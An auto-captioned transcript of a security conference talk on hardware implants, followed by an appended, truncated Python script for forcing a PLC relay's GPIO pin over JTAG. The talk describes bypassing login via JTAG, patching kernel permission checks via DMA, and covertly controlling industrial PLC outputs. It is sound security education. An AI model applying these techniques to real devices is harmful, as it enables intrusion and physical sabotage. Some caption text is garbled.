The Tao of Hardware the Te of Implants

Captions
Good morning. Welcome to The Tao of Hardware, the Te of Implants, in South Seas GH with Joe FitzPatrick. Before we start, a few brief notes: be sure to stop by the business hall located in Bayside A/B. The Black Hat Arsenal is on in the Palm Foyer on level 3, and of course the Arsenal reception at 17:00. If you haven't picked up your merchandise, today is your last chance to visit the Black Hat swag and book store. And also be sure to visit the Kali Linux lab in Mandalay Bay; I heard it's pretty cool. Also thanks for putting your phone on vibrate. Without further ado...

Hey, how's it going? I'm actually going to double check and make sure no one modified the sign, because I've seen a lot of interesting signs going around. Don't know how that could happen. Good morning, this is The Tao of Hardware, the Te of Implants. Who here likes hardware? Who here likes all the hardware talks at Black Hat? Who here would rather be at the SGX talk, the secure enclave talk? Actually, no, I'd rather be here, but there's a pretty cool secure enclave talk going on right now that I really wanted to see. But oh well, you're stuck with me instead. You'll probably actually get a seat in here; you might not get a seat in there.

So welcome. I'm Joe FitzPatrick. My background is electrical engineering with some CS and infosec mixed in there. I've been over 10 years doing professional hardware stuff: I did silicon debug on CPUs, I did security research, hardware pen testing of desktop and server CPUs, both pre- and post-silicon. So you know, you think of a code review, you think of mowing through lines of C or JavaScript or whatever language the kids are using these days; do the same thing but with Verilog. It's a lot uglier, because Verilog is ugly. The past five years I've been doing hardware security training, the past four with my own business. Right now I am teaching Applied Physical Attacks on x86 Systems; just finished a four-day class. Ask anybody who may have been in that class how it was, because I think it went really well. I also have a similar class, Applied Physical Attacks on Embedded Systems, which focuses more on MIPS and ARM targets as well.

I'm also one of the organizers of BSides PDX. If any of you need an excuse to come to Portland, it's a really awesome place. BSides PDX is there; come bug me, I'll tell you what it is, and it'll be great, it'll be fun. You'll have Voodoo Doughnut and you'll get to see all the places in Portlandia. But you're not here to hear about that; you're here to hear about hardware or something.

So there might be some confusion with the title of this talk. You know that it's not this TAO, it's that Tao, it's the philosophy. It doesn't have anything to do with the Tailored Access Operations department of the NSA. Don't worry about that; any confusion is entirely coincidental. So what is Tao? Tao is this Chinese philosophy; it's the absolute principle of the underlying universe, combining the principles of yin and yang. It's the way, the code, the behavior; it's just the natural order, right? So the Tao of hardware is that hardware really is the absolute that underlies everything in the world of computing. No matter how much time you spend making your cool software security stuff, it's still got to run on someone's hardware, and you gotta hope that that hardware is in good shape for you. On the other hand, Te is the Chinese philosophy of inner character and inner power and integrity, and so the Te of implants in this case is harnessing and understanding the inner strength of these tiny little minor additions that we can make to a system. Cheers; it's just water, I swear.

So Laozi is the author of the Tao Te Ching, or the purported author, and he said: do the things while they are simple and do the great things while they are small. Right, we talk about all the things we can do in hardware, and we have these systems where people chain like 15 vulnerabilities to go and pop calc, right? Wouldn't it be cool if we could just get down to the lowest layers and do it where we only have to flip one bit or twiddle one byte or pull one wire and bypass all that difficult software stuff? I don't know if you've noticed, I don't really like software nearly as much as I like hardware, mostly because it's hard and I'm not very good at the software side of things. So the hardware stuff, I love it, it's fun. You know, it's wires, I can see it and touch it. Software, whatever.

So, hardware implants pre-2013. There's some prior art but not much. When people thought about hardware implants (yeah, the term probably didn't have as much use back then), what people thought of was basically these mod chips for game consoles, right? This is really the only thing we had where you would go and buy a piece of hardware and stick it in another piece of hardware and do something cool. And you could use these and you could play backup games and you could play homebrew games, and there are no illegal uses of these things at all. The point is, this is a hardware implant, right? We got this tiny little circuit board, we solder it, and it's got nice little well-marked places, you know, it's all lined up, it's very easy to use. This is a very consumer-friendly hardware implant, isn't it? Right, but what happened? Der Spiegel had this article where they have a catalogue that advertises the NSA toolbox, the ANT catalog. Who knows if this is legit or not. Don't worry, I'm not going to be showing any possibly confidential or top-secret documents on the screen, so you have to shield your eyes if you happen to have regulations or rules about that. Anyway, the media saw this, they loved it: whoa, look, this is magic, they can do magic with hardware. And it's really not magic, and we're like, hey, we could do that. So we did the NSA Playset. Who has been to an NSA Playset talk or played with an NSA Playset toy at some point in time? It's fun stuff, isn't it? So the point is, hey, we can do this, let's start building this stuff. So we did; we started building these things. What we learned is that malicious hardware implants are real. Someone is doing a lot of work making them, or at least making pretty convincing PowerPoint PDF files and advertising them.

Hardware implants don't live in a vacuum. This is the big key one for me. Like, I think I got hardware access, I can do everything I want to; I don't stop to think that if I can extend that to software access, then someone who knows what they're doing can do a whole lot more than me a lot more easily. So a lot of these hardware implants, they get stuck in a system, they give software access, they grant software access, they escalate privilege, and then the rest of the thing, all the real malware, the fun stuff, the, you know, pop shells and stuff that happens in software. So the hardware's in there, it does its job, it backs off and lets the software take control. It makes a lot of sense to do it this way, right? Because, I mean, software developers, they're a dime a dozen, right? No, hardware guys, we're in high demand. Anyway, at least I pretend to think that. I just play a hardware guy on stage.

So we have five implants we're going to talk about today: blindly escalating privilege using JTAG, patching kernels via DMA on an embedded device, enabling wireless control of an off-the-shelf PLC, hot-plugging a malicious PLC expansion, and a BadUSB-style display adapter. So I don't know if any of you look at these lists, but there's been some rants about junk hacking and hacking bus stop, you know, anybody can go and buy a ten-dollar device at a consumer electronics store, open it up, and do bad things to it, right? So what's the deal? Why are we talking about this at Black Hat and DEF CON and all these world-class conferences? Well, the reason is the skills and tools and everything that we use on junk hacking is the exact same skills and tools and everything we use on critical infrastructure. You open up a home wireless router and you open up a PLC controlling a centrifuge and you're gonna find similar chips and the same kind of board layout. So there's probably a lot of people who go and do interesting things to critical infrastructure, and they're probably under NDA, but they're probably not under NDA over webcams and TV tuners and wireless routers. So when you see someone talking about this stuff, it's like, this is how I can present you these skills, this is how I can show you the state of the art without causing it to be too bad. Anyway, let's go on. So first, actually I'll drink to that. Cheers, it's all vodka. I mean water.

So, blindly escalating privilege using JTAG. Who's used JTAG before? Okay. Anybody know what it stands for? Joint Test Access Group. That really helps you understand what it is, right? So if you kind of put it into this OSI model, you've got a physical layer where you have a bunch of pins, ones and zeros that twiddle. On top of that you have a state machine, and on top of that you have an interface to give you instruction registers and data registers. And we can keep abstracting all this; we get up to the next level, we have processor- or target-specific information. MIPS does it different from ARM does it different from x86, but really we have software that abstracts all of that. At the very top level we have boundary scan; we can control the I/Os of the device. We have halt/resume control, and we have memory access. So we can execute what we want and we can execute it when we want it, and we're in charge of the CPU. So if you're curious for more of this, there's a presentation from 44CON last year and BSides Portland last year, JTAG to Root, 5 Ways. There's five different ways we went through and used JTAG to get a root shell. It's a pretty neat thing to walk through, because I looked around and I realized there's a lot of people who are hardware people who say, oh, we've got JTAG, we win, and then there's the software people who are like, well, I only speak root shell, that doesn't help me. Like, I understand I win, but how do I actually play the winning move? So I came up with a couple examples of how to do this, how to take that last step.

One of the interesting ones is patching getty. getty is a binary process, it runs in memory, and what it does is it sits there and waits for you to connect, and when you connect, it passes your username on to login, and login normally asks you for your password. In order to prevent command injection, if your username is like "-f something", you know what it does is it has this "--" at the end of the command line options, so that "--" says do not accept any more flags after this. If we can go into memory and we can patch this one byte in memory from a "--" to a "-f", we're passing a "-f" to login, and login takes "-f" to force authentication; they won't ask us for a password. So how are we going to do this? So this is SAVIORBURST; I presented this last year at Black Hat. It's a toy from the NSA Playset. It's basically an Arduino board and it has a bunch of pins that are JTAG pins. It's got an I2C flash chip that stores an SVF file, a Serial Vector Format file, which plays back a series of JTAG commands. So we'll go and use that device, we'll pop it into a system. This is a look at what the board is; it's very simple, it's only a handful of components. It's much larger than it needs to be; you could totally customize this to fit the JTAG pinout of whatever your target system might be. In order to generate that SVF, you could go and manually go through, look at the JTAG instructions and figure them out, or you could just patch OpenOCD. If you take the debug output of OpenOCD, which tells you all the IRs and DRs it sends, and write a script and convert that into an SVF file, the SVF file then you can play back without having to run OpenOCD, so you don't need a full software platform for that. Anybody bored yet? No one's falling asleep yet, but this isn't the talk right after lunch; that's the worst one, that's what I normally get. So I'm gonna flip over to a demo video. So pardon my command line, let's fullscreen that. Oh, that's not fullscreen; well, it'll have to do.

So this is the Galileo. It's an x86-like dev platform. I try and log into it as root; it asks me my password. That's kind of what you would expect, right? It's really slow too; it's a 400 megahertz, like 486-class processor. So log on as galileo; it asks us for a password, we can log in, but you know, we're just a user, that's no fun. We want a privilege escalation. Exit, get out of here. Now let's go back and look at our Galileo. I've got this SAVIORBURST all set up and programmed and it's gonna plug into the JTAG port on the back of this board. Luckily this is a development board; it's kind of contrived to target it, it already has the JTAG header there, but I mean it's running a full Linux install. We just go over, we plug our JTAG adapter in around the 3D-printed stand that I made. I'm proud of myself; it's the first 3D print I actually made from scratch. Yay, hardware. So we plug it in, it gets power. Once it gets power it starts playing back an SVF. That SVF is going to go through to actually four different spots in memory and patch them, because what I found is getty always lives in certain spots on this platform, so I just patch them all; do it the rough way. So it's running there, it's plugged in, it's patched. So we don't see no flashing lights; we don't want our implant to announce to the world. We go back to our console, we try to log in as root, and we win. Yeah, good shells. So, and yeah, we can look at the shadow file, yada yada yada. Thank you for clapping. I gave a very similar presentation recently with the exact same demo video and no one clapped, but I think it was a software audience, so I had to say, look, it's a root shell, you know, it's got the thing. You do so whatever. So I know you guys are a sharp crowd then. So there's the Galileo. Oh, so I didn't have a... oh yeah, a little misordering of slides.

So what? It's cheap, it's simple, it's readily available. I used a custom board; you could have just as easily used an Arduino Pro Micro, which is less than two square inches. The payload can be prototyped with standard tools: you can use OpenOCD to prototype your payload and then program it into this device. If the header already is there, all you have to do is plug it in; if it's not, you might have to figure out a pinout, figure out pogo pins, something like that. It's small enough you can stick it pretty much anywhere. And here's the cool thing: JTAG is JTAG, right? I've used this exact same device on ARM, on MIPS, on x86. Granted, like we said before, we've got that stack up; the upper layers are different, the meaning of those IRs and DRs are different, but the physical layer, the hardware, which is what matters to me, is all the same.

So the next one: patch kernels via DMA on an embedded device. So what is DMA? We normally see this diagram from the PCIe specification. DMA is a situation where we have a device like this PCI Express endpoint over here; maybe it's a network adapter and it's receiving packets, it wants to hand those off to the system. Instead of going and handing byte by byte to the CPU, it's able to go and walk straight over the root complex straight to memory. So an endpoint can go and write to memory. This is how a graphics card is gonna pass graphics stuff, frame buffer, maybe textures, whatever, between main memory and graphics memory. The point is DMA is direct memory access; we have devices that aren't the CPU, we have other people in the system who can read and write memory. So there's a brief history; there's actually a long history of DMA attacks, but I'm gonna give you a brief version. On the left, which I guess is your left because the slides are flipped anyway, on the left is Tribble, which is a board designed by Joe Grand and some friends of his. It's a PCI board, you plug it in and there's a little hard drive right there; this PowerPC processor goes through and periodically reads all of memory and dumps it to a disk for later fun stuff. On the right is a PCI Express-to-FireWire adapter. So there's a whole, you know, basically a decade of people talking about the fact that when you have FireWire you have a peer-to-peer connection and one of the profiles allows DMA access. So there's a bunch of tools you can use. You can plug FireWire devices into Thunderbolt, you can plug them into an ExpressCard slot, you can put them in a PCI Express slot, and suddenly the system is now vulnerable as soon as it loads those FireWire drivers. You plug the cable between the two of them and you can win, meaning get memory and get privilege escalation and maybe even root shells.

So a couple years ago I presented this; actually, as part of the NSA Playset, I called it SLOTSCREAMER. I found this reference board for this chip, which is a USB-to-PCI Express bridge. If you want to find more details of that, just search for SLOTSCREAMER; I think I put a link in there somewhere. And what I can do is I can plug this into a PCI Express slot and then from an attack computer I can go and sit there and craft PCI Express packets over USB. So I write Python into PCI Express; it gets thrown over the PCI Express hierarchy and it goes and reads memory and it brings it back to me. What's cool about this is, you know, everybody thinks PCI Express, they think graphics card and motherboards and x86 PCs and home desktops, and maybe you think about the fact that laptops have a mini PCIe slot. This little blue card inside fits in a mini PCIe slot. But there's a lot of ARM and MIPS systems now that actually have PCI Express slots as well. So this is an Nvidia Jetson board. I actually played with this in the past, where they actually use some hardware DMA protection that I didn't spend the time to get around. But there's other devices like this. This is a $10 Pogoplug. $10, you get a system that actually supports PCI Express. It doesn't really support it, because as you see I've soldered some wires on; they're very tiny wires. I soldered them to the right pins, I put the right resistors and capacitors in there so I could wire those out to an external PCI Express slot, and then I could do DMA fun stuff. But you're like, $10? $10 and the device has a PCI Express slot; that's cheaper than any devices you can get to put into the slot, cheaper than the PCB of the board you would put into the slot. Onward.

I have found this guy; it's a MIPS router, and you can see I stuck the board in there and used some high-quality electrical tape to plug it in. This is a MediaTek processor, a MediaTek MIPS processor. If you look at the functional block diagram you see it's actually got three separate PCI Express ports. As I mentioned before, I wrote some Python that crafted PCI Express packets that I send over USB to this device. What we're going to target this time is ACL enforcement. So normally when you go and look at a file, it checks the permissions on the file. It calls this function generic_permission, finds out if you have permission, and if you do it returns zero; if you don't it returns -EACCES, which is -13, I believe. So what we want to do is we want to go find the spot in the kernel in memory where this is, and luckily on a simple system the kernel always lives in the same spot, and we're gonna go and find it, we're gonna patch it and change this -13 to a zero so we always win. So let's flip over to the video, and pardon the blue bars. So here's that MediaTek platform, just kind of walking through. That's the CPU. They've got two separate chips for lots of radio stuff. This one's kind of cool: it's got a flash chip that holds the whole firmware. This chip over here, I'm gonna point to it eventually, there we go, that's a SATA controller which is connected via PCI Express. And here's my malicious board plugged into the mini PCI Express slot. Right now it's connected over USB to my laptop and I have a serial console to connect to it.

So let's see. Here we go. We're on, cat /etc/shadow. We're just a user. We look at it and we see that it is owned by root and I don't have permission to it. I cat it: permission denied. Well, let's work around that. We'll go over to the other window. Eventually I really need to get a stand for my phone so you don't get sick watching these videos. I wrote a little script, patch generic_permission. It locates the USB device, it's gonna go through and find the address in memory, patch that specific address in memory, and it's done. So that's the card: basically a USB cable to that card went through, generated PCI Express packets which wrote memory. Now I go back and I can cat /etc/shadow, and yeah. So, you know, last time I delivered this it was after lunch, so maybe everybody was just asleep and instead of clapping... We want to go back; we can always unpatch it, we put it back to the pristine state it was in before. And yeah, come on, I don't know what I'm doing. Oh yeah, gotta move the mouse, select the right window. Permission denied. So yeah, we secured the system. Whoo, there you go. So this is not truly an implant yet because I'm lazy. This little board has an 8051 CPU; whenever I get around to it I'm gonna write some code for that 8051 CPU to automate all this, but as of right now I just use a USB cable to do it in Python, because I can handle Python. 8051 requires low-level languages and compilers, which are fun and all, but that sounds like work. Toolchains are the hardest part, which is no different than hardware either, but you know. So onward.

So what? Basically these embedded devices, they are fully featured computers now, and we keep saying that over and over again: all these IoT devices, they're susceptible to all the same things that desktop computers were and laptop computers were, even down to the hardware level, now where we're adding all of these high-speed interfaces that are very highly privileged.

So next we're gonna move out of the junk hacking realm and into the spoil-all-of-your-water-and-destroy-the-power-grid type world. So we're gonna enable wireless control of an off-the-shelf PLC. This is a Siemens S7-200. I borrowed this from a friend; it's kind of an old PLC. Hey, I had looked at PLCs before, let me open this up. So I open it up, pop it off, oh, right there we see a chip. It's got a product number; I can look up that thing and get the datasheet. I know right away this is a RAM chip because of the pinout; I recognize the shape and form factor, and I know this is a flash chip. I could look up the part numbers, I can figure them out, I can read them. That's all well and good; that's the software approach. Yeah, tampering with firmware, that's kind of whatever. Let's look at the hardware. We go on to the next layer, and this whole board is dedicated to input and output. So if you notice, there's a bunch of output buffers that control what gets output to the outer system. It takes the low-level voltage that comes from the CPU, the GPIO output, and turns it into a relay or turns it into a 24-volt output. Likewise there's a bunch of input buffers that take, you know, high voltage or something in, and/or analog voltages in, and condition them so they're just right for the CPU. We go down to the next layer and that's just capacitors and power stuff, which is really fun, but there's not a lot we can do. So back up a level to this layer. We notice that there's this... can you make out that header in the middle? I hope so. Yeah, it looks better on your screen than mine probably, because there's not giant lights flashing in your eyes. We look at this header, we have a bunch of pins, and if we use a multimeter we can find out that these buffers connect to these pins, which brings them up to the next layer to the CPU; these buffers connect to these pins that bring them up to the CPU. So let's take a look at that. It's kind of a double-layered 0.1-inch header. If we could intercept any one of those signals, we could control what happens on any output downstream from the CPU.

So I thought, okay, this is great, I'm gonna go and I'm gonna make an implant. Right, this little guy is an Arduino board that cost $2 and an nRF radio that costs $1, and I put in like $1 worth of wire, so the wire cost is a significant portion of the cost of this implant. I stick it in there, and I want to snip one of those leads and put it in place, but this is someone else's hardware and they didn't want me to tamper with it. And besides, when you do put it back together, right, you can't see it, right? The device is in there; you've taken the top off the device, you still can't see the implant. Onward. You know, put it back together; there's no tamper-evident anything. You can pop the tabs off the side, open it, close it many times, you'll never notice it. But I couldn't get software for this device, so we made no software changes, right? All the original hardware is in there; the modification that I might have made isn't apparent, and one signal could be wirelessly set or unset. That connector that we looked at also connects to this DB9 programming port, which would be great if we wanted to intercept the programming that was going on the device as well. So I wanted to get this working, I wanted to demonstrate it, and I went and I looked and it was nearly impossible to get the software to configure this guy. I've later found out there's actually an open-source software package that does it as well; I haven't played with that yet. So it's actually cheaper for me to go and buy a newer system and do the same thing. And I thought, okay, it's a newer system, they're gonna have updated something, it's gonna be all integrated into a single chip, like, you know, progress and stuff. Nope, similar to how it was before. Actually this goes straight down to the I/O board. The I/O board is a little different; it has one giant header instead of two small headers. You can see those white things at the bottom of the relays and the power board at the very bottom. There was a CPU board just above, which I failed to show you.

What I did notice is this thing has LEDs on the front that show you which inputs and outputs are on and off. So what it is, I looked at those LEDs and you see there's little gold holes underneath. So on the left are the LEDs, these white things; right underneath them is this little hole that is a via to the other side. Those vias connect over here, down here. So I traced these signals out; they go through this buffer chip up to these legs over here. That's the bottom of the connector that goes to the next board. When I go to the next board, I look at the connector and I trace it, right: these four signals right here are outputs, and they all go through this little package right here. This is a bank resistor, so it's a whole bunch of resistors in one chip, because it's easier to place one chip than it is to place four small resistors. This resistor actually protects the inputs and outputs of the CPU and the other circuit. So all I need to do is solder one wire onto this one spot right here and I can control the output of the relay without the operating system, without the software, having any means of actually knowing what's going on. It's gonna spit out a 1 on this wire; on the other side of this resistor it's gonna be a 0 if I say so. So let's walk through the video of installing and using this implant. Other screen, three.

So here's the little implant. I put it in a ziploc bag because, you know, then it's not gonna short things out. I soldered one leg to a ground on a capacitor, another to a power pin on a chip that I recognized, I was able to get the datasheet, and that one data pin is the one that actually does the flipping of the bits. I have to get all those little itty-bitty wires so they don't interfere with things. I put it in; I'll get the top board and mount it right on top once I get things out of the way. There we go; top board plugs on, and that's where that big chip in the middle is the CPU. It's got flash and RAM as well. Tuck those wires in so it doesn't get found. Put the case back on top, snap, and then we are gonna go turn it on. And I'm gonna walk through, and I don't believe you have audio, but let's see, does this mic work? Maybe I'll just... whatever, it's plain. Okay, so it's gonna beep as soon as I start playing with the switches. This is the demo mode. I'm gonna turn it, clear it and turn it on and set it, and then there's a reset latch. I let go, I need to put the second input and that resets it. Simple demo; that's just how they work. Put them both on and they go on until one goes off. There you go. I'm gonna go over here and I have another wireless adapter hooked up to my laptop, the exact same hardware, just with a longer wire, and I have a little shell script to basically send a serial command: output to one, output to zero, and disabled. So disabled, with high impedance, lets the system regain control of the output. So let's look over here. When it beeps, that's the multimeter telling us that this output is on and shorted out. I'm remotely turning it on and off, and you'll notice there's no light lit up on the LED to tell us the output is on. Right, we go, I've turned it off. It thinks it's... it's on, but no beep, so it's off. Right, I used my radio control, I can turn it on/off and disable it. Another fun trick I can do is I can go over, and this device has all sorts of stuff built in to make sure it doesn't do things that it shouldn't do; I can go through and send a bunch of commands and turn it on and off really fast, which for some things might be really bad. Think about anything electronic that shouldn't be turned on and off fast. Onward. Let's see, half an hour.

So, so what? It's a cheap implant, it's mostly off-the-shelf open-source code, but literally I took the demo file and changed three lines to make this work, and this could be retrofitted to pretty much any I/O type. If you know where to put this wire, where to toggle that bit, you can use this on any kind of system.

So onward. Let's do a malicious hot plug: a malicious PLC expansion module. This is another PLC I got. I bought it because it's the cheapest one you can buy on Digi-Key. It's made by Phoenix Contact, which is actually a pretty good company, and it's a nicely well-designed piece of thing with some decent software. But the first thing I do when I open this up is I look at it and there's one thing that just jumps out at me and says, Joe, look at me, look at me, look at me, and it's over here in the bottom-left corner. Anybody know what that is? JTAG, yay. And once we have JTAG we have fun and win. And we can look at the chip; it's an NXP LPC1765, which I can go and get a datasheet for and know exactly how to use. Luckily I look at the datasheet and, oh, there's code security protection, there's security, we're gonna be foiled. You can disable JTAG on this chip, you can disable flash updates, you can disable it to disable access to any JTAG commands. But this is the real world; anybody gonna guess what it was set to? Yeah, wide open. So looking at it like this, this is a spot where our little expansion module plugs in, and you may not be able to see it, but in the middle is a little black header, I believe it's either eight or ten pins in the middle; that's where it connects. Right next to it are these pins, like, hmm, that's nice and close. So this is the USB connector that normally goes in there that lets you program it; this is the blank that's in there when it's not in use, and this is the connector it normally connects with after the USB one. So if I have JTAG, what can I do? I look at the memory map of this chip and I see there's a range dedicated to GPIO, and there's a bunch of bits that I can use to set and unset the GPIO values, specifically the port pin value, and it tells me the address in memory that I go to, excuse me, to set or unset that. I look at the relays up top; I know that that's what makes things happen. I use my multimeter and trace it down to figure out which GPIO pin of that NXP chip is the one I want to talk to. I look at the datasheet and find out what address it's at, and I'm gonna make a JTAG script that's gonna go and write to that address and turn on or off that GPIO.

So back to a video. For the sharp ones, you'll notice I only have four videos, yet I said five implants, so you're like, oh, he's gonna cheat us. I'm gonna cheat you anyway. Hooking up the same way as before: we've got our little display, we can go through and we can enable and disable an output using the front, and you know it outputs, it beeps, makes a loud annoying noise. We can reset the output or clear the override. I've got my implant that I'll pick up and show you; it's got a bunch of pogo pins, right? Those pogo pins are lined up to match with those JTAG pins, so all I need to do is plug it in and it'll play my script, because it's gonna get power and go; it's set up to go. And actually, here, this is what a pogo pin is, if you're not familiar; it's a little cone, pins that have a spring inside, so they're springy. So I pop this in, it's going to wait five seconds, it's going to write to that I/O port, and... thank you. And the thing is, we just hope that the processor wrote a bit and then stopped, and we can go... the software doesn't know that happened; it doesn't check the value of that register. All we do is hit the buttons and we can go and disable it. There's no persistent control there. There we go again: we didn't go and change the code in memory, we didn't modify them, we just went straight to the GPIO. If you wanted to, you could tamper with memory, you could, you know, write your malware, whatever the fun things you like to do with software; you have the power to do that at that point. There we go.

So what? JTAG could be disabled, but it's usually not. Sometimes you get situations where it actually is disabled, but the way it's disabled is a way that you can work around with more intensive hardware hacking. At some point in time you just have to figure out how much money you want to spend: do you want to spend a hundred thousand dollars or ten thousand dollars and use a FIB to enable JTAG? It might be worth it for you. Again, that would be more invasive; it wouldn't just be an implant. JTAG test headers are quick and easy to access; this can be used on a unit in operation, and you can just be walking by on a factory tour and just be like, you know, and have it timed too. I mean, you could combine this with the other one and get remote control. You could do whatever you want; when it's hardware, all the doors are open for you, right? And when you get JTAG working, you win, right? When you have JTAG you own the CPU, you own memory, you're in charge. Again, there's all these caveats: there's when JTAG is disabled, there's when you have hardware protections, but that's kind of what you get.

So the last one we've got is a BadUSB-style display adapter, and this is one that I have high hopes for, and I'm just gonna show you where I am with it, because I haven't turned it into an implant yet, because I'm busy and lazy. So, you know, there's been some previous presentations, actually from the NSA Playset. This one on the left is BLINKERCOUGH; it was basically a modified VGA cable that you'd, let's say, install a bunch of these and they would use infrared communications to make a little mesh network and exfiltrate data over I2C. Fun stuff. You know, you think about a Faraday cage, right? It's supposed to keep everything in and out, but it's just a mesh of copper; like, lights that flash around might actually not get through, unless you're in a fancy place that has infrared communication blockers. On the right we have alloy fiber; this cable over here, it looks like a Thunderbolt-to-VGA adapter with a sketchy old VGA
cable but this is actually a fire Thunderbolt cable that goes all the way through and connects to this box with current which Canadian contains a slot screamer and a daisy chains an actual VGA adapter so that you can go and plug in so like I could have plugged in right here to a sketchy VGA cable with it oh they already have the adapter for my macbook everything shows up on the screen just as normal but mean in the meantime there's a box under the table that's copying the contents of my memory well so USB C is this new thing it's like this magic thing the new MacBook has so they have this pretty like the ability to connect everything you need the idea with USB C is they wanted to make this the universal port like universal serial bus so they combined a whole bunch of different protocols into it just like we're at Thunderbolt was this interconnect you just DisplayPort or PCI Express USB C allows you to do display port if it's Thunderbolt enabled it allows you to do PCI Express it allows you to do all this stuff over a single port what's interesting is what's in these adapters so if you have the new MacBook or I think the the Chromebook pixel the only port you have is USB C port it's even used for charging so you have to pay 80 bucks for this fancy cable that gives you power display and USB to do anything right so you'd plug that in and you plug a hub in and you plug your remote in and then you plug everything else in that's why costs 80 bucks there's also probably like $70 worth of shielding wrapped around that I already peeled off the $20 version is like the cheap one you can get on Amazon which is the one I normally use but instead I'm using this this one which is also ripped open it's this is neat it's a firmware update I will show you that in just a second if we look at the Apple ones though what do we see JTAG so again I I noticed this I've hooked it up it is the in fact JTAG I haven't poked at it or modified or flash anything but think about it we've got this 
device it's the trusted device we carry around with us it's the one we plug in when we present and this is not a passive device anymore we're not dealing with a display adapter we're just dealing with a expansion to our system that is potentially very low level access to the hardware that also does display so let's look at the cheap one right we put rip it open you've got one chip right there again USB see can do native DisplayPort in this inside here there's a little chip and that does the DisplayPort to VGA adapter protocol changing and then the next thing we look at this chip is an XP chip that is a USB power delivery chip and this is what negotiates with the host to say hey I'm a vga adapter which means I need 5 volts at you know 500 milliamps please send me that power which seems reasonable right except it might also say hey I'm a laptop send me 20 volts at 4 amps and that can make bad things happen to devices that weren't expecting 20 volts to suddenly be rushing down the USB wires but what's really interesting on this one is this chip and this is another an XP chip it's a USB device this is what tells a system that it's a u.s. 
display adapter you plug it in it says oh your display adapter let me turn on display stuff and ignore the rest what I noticed though heard of you DFU direct firmware update this chip is firmware updatable over USB yeah hey we just plugged it in over USB so I can dump the firmware off of that go through tamper it modify it send it back and my objective of what I'm gonna do with this one not the one I use when I present but the one I want to share with other people who know that presenta don't play a nasty trick on is I'm gonna have it set up to do the forward and back buttons right as a USB device so you plug this in you think it's your display adapter it also shows up as a here an interface device and lets you advance slides and it's just gonna randomly advance their slides for them I think that's I think that's a fun prank I don't have a video demo I haven't done that yet it's just my plan so pardon me the I I guess I always worry that I'm gonna over over promise and under deliver and a talk I hope I haven't done that cuz I said 5 and I'm only giving you four and a half so please forgive me that means you know on the ratings you just give me a four and a half instead of a five right so DFU util it's free software you go and you open and you can dump the contents of that firmware and you can modify them and write them back it's an arm m0 core so as long as you know how to write arm code you can do fun stuff with that so what when we have only one port that port can do anything it's an implant designers dream hardware isn't just hardware anymore there aren't passive devices right I mean even in a class that each week we play with HDMI you know everybody knows that that somehow the the cable tells the system what the resolution of the display is in order to do that it has to communicate it's a two-way communication over HDMI all these things that we think are passive devices are not anymore there's sad thing is there's no reasonable way for a user to know what a 
device does right if I go to the Apple Store and I tell them I want to display something and they give me this like okay it's it's a plastic box I got it from Apple it's sealed except for this one isn't sealed we need to have a better way of actually telling people what is inside and what is actually working so today's implants we did a blindly escalating privilege using JTAG right we patch kernels via DMA on an embedded device we enabled wireless control often they off shelf PC a PLC we hot plugged this expansion device which actually used the same JTAG binos code and hardware as the first example but on a very different setting and then we talked about how we could just take take a device that everyone trusts and someone you could buy off a store online and and plug it in and it's just not gonna do what you think it does even though you think it's such a simple adapter so look at this this is all about the DisplayPort stuff stacked up on a $20 bill and so this solder peak couple bucks you know you could do it with an Arduino board and some pogo pins like I did here less than five bucks the Arduino plus the NRF you know three bucks worth of hardware some wires and over here we've got the slot screen which is kind of pricey it's like 60 to 70 bucks but if you're if you're dead set on making an implant I think that's well within your price range the point is between five and seventy-five dollars a hobbyist could build these many of them are actually published on the NSA place that website and github if you're interested in building your own they weigh less than an ounce they can be customized they're all pretty Universal once you get down to the lowest level of the hardware you know ones and zeros are voltages and it doesn't matter whether you're MIPS arm or x86 it's all the same doesn't matter if you're an embedded system it's all the same so you can customize these pretty easily to many different targets and this I really think barely scratches the surface of 
what's possible these are a bunch of things I built in my spare time I don't actually sell these I don't like have any government contracts where I supply hardware implants to anyone that would really cool actually it wouldn't be pretty cool I would kind of not be interested in doing that if you're thinking of asking me but you know this is what I do for fun so if you're funded if you're a state actor this is well well well within what you should be aware of and you should be able to do with very little time and effort and money hardware is cheap standard interfaces really are standard automating these little devices is trivial if you can't trust the hardware you can't trust the software right if you can't control if you can control the hardware then in some way shape or form you can control the software okay those are my take away he's not gonna leave you with another philosophical thought so there's a story about the three vinegar tasters and there's lots of old images you know pictures of these guys so on the Left we've got confuse which I think the left is Confucius right he tastes this bowl of this jar of vinegar and it says how it tastes sour because vinegar is wine that has been polluted that's past its prime it's spoiled clearly this represents the conference goer who missed the open bar right now the next one is Buddha right he tastes the vinegar he says oh this tastes bitter but you know life is pain and suffering that's what we should expect and we should just deal with it he's probably an instant responder okay lastly we have Lau's a and he's smiling he tastes the vinegar and he's like up vinegar I know what I'm doing and he goes and gets some peroxide and some salt and he mixes it up and he uses that to etches PCBs to make his hardware implants so [Applause]
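The JTAG GPIO implant in the talk is described in a few steps: find the pin that drives the relay with a multimeter, look up its set/clear register address in the datasheet, wait for the target to come up, write one bit. As an added example (not the speaker's implant code, which runs on an Arduino with pogo pins), the script below builds that write as host-side OpenOCD commands and checks it against a small model of the register block. Assumptions: OpenOCD is used as the JTAG tool (the talk does not name one); the fast-GPIO register layout is taken from the NXP LPC17xx user manual, UM10360, which covers the LPC1765 (FIO block at 0x2009C000, 0x20 bytes per port, FIOxPIN/FIOxSET/FIOxCLR at +0x14/+0x18/+0x1C); and the port and pin numbers are placeholders, since the talk does not say which pin the relay is on.

```python
"""Added example, not from the talk: build and check a JTAG script that
forces one GPIO pin on an NXP LPC17xx (the PLC's LPC1765) by writing its
memory-mapped fast-GPIO set/clear register.

Assumptions (labelled): OpenOCD as the JTAG tool; register addresses from
the LPC17xx user manual UM10360; port/pin below are placeholders, the real
relay pin is found by tracing from the relay back to the CPU with a meter.
"""
from __future__ import annotations

FIO_BASE = 0x2009C000        # fast-GPIO block for port 0 (UM10360)
PORT_STRIDE = 0x20           # ports 0..4 are 0x20 bytes apart
FIO_PIN, FIO_SET, FIO_CLR = 0x14, 0x18, 0x1C   # offsets inside a port block
NUM_PORTS = 5


def fio_reg(port: int, offset: int) -> int:
    """Address of one FIOx register (offset is FIO_PIN, FIO_SET or FIO_CLR)."""
    if not 0 <= port < NUM_PORTS:
        raise ValueError(f"LPC17xx has GPIO ports 0..{NUM_PORTS - 1}, got {port}")
    return FIO_BASE + port * PORT_STRIDE + offset


def gpio_script(port: int, pin: int, level: int, delay_ms: int = 5000) -> list[str]:
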